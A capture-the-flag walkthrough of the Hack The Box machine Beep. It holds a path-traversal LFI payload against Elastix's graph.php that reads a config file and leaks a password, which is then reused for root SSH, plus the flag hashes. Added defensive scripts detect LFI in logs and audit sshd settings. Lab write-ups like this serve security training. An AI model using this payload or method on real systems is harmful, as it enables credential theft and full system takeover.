[HTB] Beep

Today we are going to hack the HTB machine called Beep.

Enumeration


To start, we run nmap to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 15:17 CEST
Nmap scan report for 10.10.10.7
Host is up (0.043s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDST
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE USER UIDL EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE NAMESPACE MULTIAPPEND OK ACL ATOMIC URLAUTHA0001 X-NETSCAPENCES ANNOTATEMORE CHILDREN RENAME CATENATE ID CONDSTORE NO LITERAL+ IMAP4rev1 SORT=
443/tcp   open  ssl/https?
|_ssl-date: 2020-05-09T13:21:41+00:00; +1s from scanner time.
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (include
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 378.53 seconds

Visiting http://10.10.10.7 we can see that it is running Elastix. We look for an exploit that might be useful to us.

sml@Cassandra:~$ searchsploit elastix
------------------------------------------- ----------------------------------------
 Exploit Title                             |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vu | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Script | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inc | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Co | exploits/php/webapps/18650.py
------------------------------------------- ----------------------------------------
Shellcodes: No Result

Exploitation


We will use "Elastix 2.2.0 - 'graph.php' Local File Inclusion". Let's see what the exploit does.

sml@Cassandra:~$ cat /usr/share/exploitdb/exploits/php/webapps/37637.pl
---SNIP---
#LFI Exploit: 
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
---SNIP---
Right, it is an LFI, so we test it by visiting:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Of all the text that comes back, the line that interests us is the following:

AMPMGRPASS=jEhdIekWmdjE

We log in using the password found in the previous step.
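The payload above is a classic path-traversal LFI with a null-byte terminator, and from the defender's side it is easy to spot in the web server logs. The following Python script is an added example for this write-up (not code from the original post or from Elastix): it parses Apache access-log lines and flags traversal sequences, null bytes and reads of sensitive files such as amportal.conf in any query parameter, including double-encoded variants. The log lines are constructed for the demo and are not from the target.

```python
"""Flag LFI / path-traversal attempts in Apache access-log lines.

Added example for this write-up (not code from the original post or from
Elastix). The pattern is the one the page shows, a current_language=../..%00
payload against /vtigercrm/graph.php, generalised to any query parameter.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined format (not from the target).
SAMPLE_LOG = """\
10.10.14.5 - - [09/May/2020:15:30:01 +0200] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.5 - - [09/May/2020:15:30:07 +0200] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.10.14.5 - - [09/May/2020:15:30:09 +0200] "GET /vtigercrm/graph.php?current_language=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1930 "-" "curl/7.68.0"
10.10.14.5 - - [09/May/2020:15:30:12 +0200] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 1930 "-" "Mozilla/5.0"
"""

# ip, ident, user, [timestamp], "METHOD target protocol", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\)")
# Files whose appearance in a parameter indicates a sensitive read.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "amportal.conf", "/etc/asterisk/")


def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (double encoding is a common evasion)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return a list of finding strings for one request target; empty if clean."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl decodes one layer of %xx already; decode_fully handles the rest.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal in {name}")
        if "\x00" in value:
            findings.append(f"null byte in {name}")
        for path in SENSITIVE:
            if path in value:
                findings.append(f"sensitive path {path} in {name}")
    return findings


def scan_log(text):
    """Return a list of alert dicts, one per suspicious log line."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        findings = inspect_request(m["target"])
        if findings:
            alerts.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "target": m["target"],
                "findings": findings,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], alert["target"])
        for f in alert["findings"]:
            print("   ", f)
```

Note that a 200 status on a flagged line (as in the second sample) is the interesting case: the traversal did not get blocked, so the response most likely contained the file.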

sml@Cassandra:~$ ssh root@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
sml@Cassandra:~$ ssh -oKexAlgorithms=+diffie-hellman-gr
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon)el)
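Two weaknesses made this login possible: the Asterisk manager password sat in a config file the web server could read and was reused as the root password, and sshd accepted password logins for root while offering only SHA-1 based key exchange (which is why a current ssh client refused to negotiate until forced with -oKexAlgorithms). The following Python script is an added example for this write-up (not code from the original post or from OpenSSH) that audits an sshd_config for exactly those settings. The sample config is constructed for the demo and is not the target's real file.

```python
"""Audit an sshd_config for root password login and legacy key exchange.

Added example for this write-up, not code from the original post or from
OpenSSH. Sample config below is constructed, not the target's real file.
"""

# Key-exchange methods OpenSSH keeps only for legacy compatibility.
LEGACY_KEX = {
    "diffie-hellman-group1-sha1",          # 1024-bit MODP group, SHA-1
    "diffie-hellman-group-exchange-sha1",  # negotiated group size, but SHA-1
    "diffie-hellman-group14-sha1",
}

SAMPLE_SSHD_CONFIG = """\
# constructed sample, loosely modelled on an old CentOS 5 style config
Port 22
Protocol 2
#PermitRootLogin yes
PasswordAuthentication yes
KexAlgorithms diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Subsystem sftp /usr/libexec/openssh/sftp-server
Match User backup
    PasswordAuthentication no
"""


def parse_sshd_config(text):
    """Return the effective global directives as {keyword_lower: value}.

    sshd honours the first occurrence of a keyword, and directives inside a
    Match block apply only to that block, so parsing stops at the first Match.
    """
    directives = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip()
        if keyword == "match":
            break
        directives.setdefault(keyword, value)  # first occurrence wins
    return directives


def audit(directives):
    """Return a list of (severity, message) findings; empty when nothing is flagged."""
    findings = []

    root = directives.get("permitrootlogin")
    if root is None:
        # Before OpenSSH 7.0 the compiled-in default was "yes".
        findings.append(("high", "PermitRootLogin not set; old releases default to allowing root password login"))
    elif root.lower() == "yes":
        findings.append(("high", "PermitRootLogin yes: a reused or leaked password gives root directly"))
    elif root.lower() in ("without-password", "prohibit-password"):
        findings.append(("low", f"PermitRootLogin {root}: root login allowed with keys only"))

    # sshd default for PasswordAuthentication is yes.
    if directives.get("passwordauthentication", "yes").lower() == "yes":
        findings.append(("medium", "PasswordAuthentication yes: credentials recovered elsewhere are enough to log in"))

    kex = directives.get("kexalgorithms")
    if kex is not None:
        # Leading +, - or ^ modifies the default list; strip it before inspecting names.
        offered = [k.strip() for k in kex.lstrip("+-^").split(",") if k.strip()]
        legacy = [k for k in offered if k in LEGACY_KEX]
        if legacy:
            findings.append(("medium", "legacy key exchange enabled: " + ", ".join(legacy)))
        if legacy and len(legacy) == len(offered):
            findings.append(("high", "only legacy key exchange offered; modern clients refuse to connect by default"))

    return findings


if __name__ == "__main__":
    for severity, message in audit(parse_sshd_config(SAMPLE_SSHD_CONFIG)):
        print(f"[{severity}] {message}")
```

The remediation the audit points at is the usual one: PermitRootLogin no, PasswordAuthentication no with key-based login for named administrators, and a KexAlgorithms list without the SHA-1 methods, plus a distinct Asterisk manager password that is not shared with any system account.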

user.txt



[root@beep ~]# cd /home
[root@beep home]# ls
fanis  spamfilter
[root@beep home]# cd fanis
[root@beep fanis]# ls
user.txt
[root@beep fanis]# cat user.txt
aeff3def0c765c2677b94715cffa73ac

root.txt



[root@beep fanis]# cd /root
[root@beep ~]# ls
anaconda-ks.cfg		   install.log.syslog  webmin-1
elastix-pr-2.2-1.i386.rpm  postnochroot
install.log		   root.txt
[root@beep ~]# cat root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#

End


And with this we have both the "user" flag and the "root" flag.